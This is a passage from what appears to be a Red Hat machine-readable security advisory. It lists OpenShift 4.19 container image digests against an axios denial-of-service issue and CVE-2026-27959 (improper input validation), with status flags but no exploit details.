"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-27959",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2026-02-26T03:01:14.695334+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
